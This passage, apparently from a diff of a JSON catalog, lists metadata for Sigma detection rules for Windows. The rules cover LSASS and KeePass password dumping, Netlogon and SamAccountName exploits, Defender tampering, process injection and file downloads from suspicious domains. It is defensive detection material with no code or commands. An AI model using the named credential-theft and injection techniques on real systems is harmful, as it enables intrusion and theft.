"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2020/10/20", - "filename": "win_system_volume_shadow_copy_mount.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "level": "low", - "falsepositive": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", - "value": "Vulnerable Netlogon Secure Channel Connection Allowed", - "meta": { - "refs": [ - "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2020/09/15", - "filename": "win_system_vul_cve_2020_1472.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "value": "Exploit SamAccountName Spoofing with Kerberos", - "meta": { - "refs": [ - "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2021/12/15", - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", - "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", - "value": "Rare Scheduled Task Creations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.s0111", - "attack.t1053.005" - ], - "creation_date": "2017/03/17", - "filename": "win_rare_schtask_creation.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Software installation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", - "value": "Suspicious Scheduled Tasks Locations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2022/12/05", - "filename": "win_task_scheduler_susp_task_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", - "value": "Ngrok Usage with Remote Desktop Service", - "meta": { - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - "https://ngrok.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/04/29", - "filename": "win_terminalservices_rdp_ngrok.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Access to LSASS Process", - "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "value": "LSASS Access Detected via Attack Surface Reduction", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2018/08/26", - "filename": "win_defender_alert_lsass_access.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects triggering of AMSI by Windows Defender.", - "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "value": "Windows Defender AMSI Trigger Detected", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/09/14", - "filename": "win_defender_amsi_trigger.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects disabling Windows Defender threat protection", - "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "value": "Windows Defender Threat Detection Disabled", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/07/28", - "filename": "win_defender_disabled.yml", - "author": "J\u00e1n Tren\u010dansk\u00fd, frack113", - "level": "low", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Setting of Windows Defender Exclusions", - "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "value": "Windows Defender Exclusions Added", - "meta": { - "refs": [ - "https://twitter.com/_nullbind/status/1204923340810543109", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/06", - "filename": "win_defender_exclusions.yml", - "author": "Christian Burkard", - "level": "medium", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "value": "Windows Defender Exploit Guard Tamper", - "meta": { - "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/08/05", - "filename": "win_defender_exploit_guard_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", - "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", - "value": "Windows Defender Malware Detection History Deletion", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001" - ], - "creation_date": "2020/08/13", - "filename": "win_defender_history_delete.yml", - "author": "Cian Heasley", - "level": "high", - "falsepositive": [ - "Deletion of Defender malware detections history for legitimate reasons" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "value": "PSExec and WMI Process Creations Block", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", - "https://twitter.com/duff22b/status/1280166329660497920", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" - ], - "creation_date": "2020/07/14", - "filename": "win_defender_psexec_wmi_asr.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection", - "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", - "value": "Microsoft Defender Tamper Protection Trigger", - "meta": { - "refs": [ - "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/05", - "filename": "win_defender_tamper_protection_trigger.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Administrator actions" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects all actions taken by Windows Defender malware detection engines", - "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "value": "Windows Defender Threat Detected", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/07/28", - "filename": "win_defender_threat.yml", - "author": "J\u00e1n Tren\u010dansk\u00fd", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", - "value": "WMI Persistence", - "meta": { - "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" - ], - "creation_date": "2017/08/22", - "filename": "win_wmi_persistence.yml", - "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda", - "value": "Bumblebee Remote Thread Creation", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" - ], - "creation_date": "2022/09/27", - "filename": "create_remote_thread_win_bumblebee.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "value": "CACTUSTORCH Remote Thread Creation", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1090588499517079552", - "https://github.com/mdsecactivebreach/CACTUSTORCH", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" - ], - "creation_date": "2019/02/01", - "filename": "create_remote_thread_win_cactustorch.yml", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", - "value": "CobaltStrike Process Injection", - "meta": { - "refs": [ - "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ], - "creation_date": "2018/11/30", - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", - "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "value": "CreateRemoteThread API and LoadLibrary", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ], - "creation_date": "2019/08/11", - "filename": "create_remote_thread_win_loadlibrary.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", - "value": "KeePass Password Dumping", - "meta": { - "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", - "https://github.com/denandz/KeeFarce", - "https://github.com/GhostPack/KeeThief", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.005" - ], - "creation_date": "2022/04/22", - "filename": "create_remote_thread_win_password_dumper_keepass.yml", - "author": "Timon Hackenjos", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "value": "Password Dumper Remote Thread in LSASS", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.s0005", - "attack.t1003.001" - ], - "creation_date": "2017/02/19", - "filename": "create_remote_thread_win_password_dumper_lsass.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Antivirus products" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "value": "Accessing WinAPI in PowerShell. Code Injection", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/06", - "filename": "create_remote_thread_win_powershell_code_injection.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", - "value": "PowerShell Rundll32 Remote Thread Creation", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" - ], - "creation_date": "2018/06/25", - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119", - "value": "Suspicious Remote Thread Source", - "meta": { - "refs": [ - "Personal research, statistical analysis", - "https://lolbas-project.github.io", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2019/10/27", - "filename": "create_remote_thread_win_susp_remote_thread_source.yml", - "author": "Perez Diego (@darkquassar), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "uuid": "f016c716-754a-467f-a39e-63c06f773987", - "value": "Suspicious Remote Thread Target", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml" - ], - "tags": "No established tags", - "creation_date": "2022/08/25", - "filename": "create_remote_thread_win_susp_remote_thread_target.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects a remote thread creation in suspicious target images", - "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "value": "Remote Thread Creation in Suspicious Targets", - "meta": { - "refs": [ - "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" - ], - "creation_date": "2022/03/16", - "filename": "create_remote_thread_win_susp_targets.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", - "value": "Remote Thread Creation Ttdinject.exe Proxy", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/05/16", - "filename": "create_remote_thread_win_ttdinjec.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_remote_thread", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", - "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "value": "Executable in ADS", - "meta": { - "refs": [ - "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ], - "creation_date": "2018/06/03", - "filename": "create_stream_hash_ads_executable.yml", - "author": "Florian Roth, @0xrawsec", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_stream_hash", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", - "uuid": "573df571-a223-43bc-846e-3f98da481eca", - "value": "Creation Of a Suspicious ADS File Outside a Browser Download", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/10/22", - "filename": "create_stream_hash_creation_internet_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" - ], - "logsource.category": "create_stream_hash", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", - "value": "Hacktool Download", - "meta": { - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ], - "creation_date": "2022/08/24", - "filename": "create_stream_hash_hacktool_download.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_stream_hash", - "logsource.product": "windows" - } - }, - { - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "value": "Exports Registry Key To an Alternate Data Stream", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2020/10/07", - "filename": "create_stream_hash_regedit_export_to_ads.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_stream_hash", - "logsource.product": "windows" - } - }, - { - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "value": "Suspicious File Download from File Sharing Domain", - "meta": { - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ], - "creation_date": "2022/08/24", - "filename": "create_stream_hash_susp_domain_ext_combo.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_stream_hash", - "logsource.product": "windows" - } - }, - { - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", - "value": "Unusual File Download from File Sharing Domain", - "meta": { - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ], - "creation_date": "2022/08/24", - "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_stream_hash", - "logsource.product": "windows" - } - }, - { - "description": "Detects the download of suspicious file type from URLs with IP", - "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", - "value": "Unusual File Download from Direct IP Address", - "meta": { - "refs": [ - "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/09/07", - "filename": "create_stream_hash_susp_ip_domains.yml", - "author": "Nasreddine Bencherchali, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "create_stream_hash", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "value": "Query To Remote Access Software Domain", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/07/11", - "filename": "dns_query_remote_access_software_domains.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "FP may be caused in legitimate usage of the softwares mentioned above" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "uuid": "065cceea-77ec-4030-9052-fc0affea7110", - "value": "DNS Query for Anonfiles.com Domain", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2022/07/15", - "filename": "dns_query_win_anonymfiles_com.yml", - "author": "pH-T", - "level": "high", - "falsepositive": [ - "Legitimate access to anonfiles.com" - ], - "logsource.category": "dns_query", - "logsource.product": "windows" - } - }, - { - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "value": "DNS HybridConnectionManager Service Bus", - "meta": { - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ], - "creation_date": "2021/04/12", - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" - ], - "logsource.category": 